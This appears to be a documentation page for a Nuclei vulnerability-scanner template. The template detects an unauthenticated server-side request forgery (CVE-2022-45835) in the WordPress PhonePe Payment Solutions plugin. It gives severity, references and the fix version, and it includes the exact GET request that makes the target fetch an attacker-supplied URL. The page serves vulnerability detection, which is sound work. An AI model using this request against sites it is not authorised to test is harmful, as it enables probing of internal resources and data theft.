WordPress PhonePe Payment Solutions <=1.0.15 - Server-Side Request Forgery
ID: CVE-2022-45835
Severity: high
Author: theamanrawat
Tags: cve,cve2022,ssrf,wordpress,wp-plugin,wp,phonepe-payment-solutions,unauth,oast,phonepe
Description
Section titled “Description”WordPress PhonePe Payment Solutions plugin through 1.0.15 is susceptible to server-side request forgery. An attacker can cause a website to execute website requests to an arbitrary domain, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
YAML Source
Section titled “YAML Source”id: CVE-2022-45835
info: name: WordPress PhonePe Payment Solutions <=1.0.15 - Server-Side Request Forgery author: theamanrawat severity: high description: | WordPress PhonePe Payment Solutions plugin through 1.0.15 is susceptible to server-side request forgery. An attacker can cause a website to execute website requests to an arbitrary domain, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. impact: | An attacker can exploit this vulnerability to send arbitrary HTTP requests from the server, potentially leading to unauthorized access to internal resources or performing actions on behalf of the server. remediation: Fixed in version 2.0.0. reference: - https://patchstack.com/database/vulnerability/phonepe-payment-solutions/wordpress-phonepe-payment-solutions-plugin-1-0-15-server-side-request-forgery-ssrf - https://wordpress.org/plugins/phonepe-payment-solutions/ - https://nvd.nist.gov/vuln/detail/CVE-2022-45835 - https://patchstack.com/database/vulnerability/phonepe-payment-solutions/wordpress-phonepe-payment-solutions-plugin-1-0-15-server-side-request-forgery-ssrf?_s_id=cve classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-45835 cwe-id: CWE-918 epss-score: 0.00359 epss-percentile: 0.72144 cpe: cpe:2.3:a:phonepe:phonepe:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 1 vendor: phonepe product: phonepe framework: wordpress tags: cve,cve2022,ssrf,wordpress,wp-plugin,wp,phonepe-payment-solutions,unauth,oast,phonepe
http: - raw: - | GET /?phonepe_action=curltestPhonePe&url=http://{{interactsh-url}} HTTP/1.1 Host: {{Hostname}}
matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http"
- type: word part: body words: - "cURL Test for PhonePe"
- type: status status: - 200# digest: 4a0a0047304502204765a3fd7db2b2016f4074315a289cb44588ae194f2115553d60ecaf35f0c7b9022100c3607f8e6432988b38d197d3e739552c9991fa183f4f72295afc655f1f45476a:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-45835.yaml"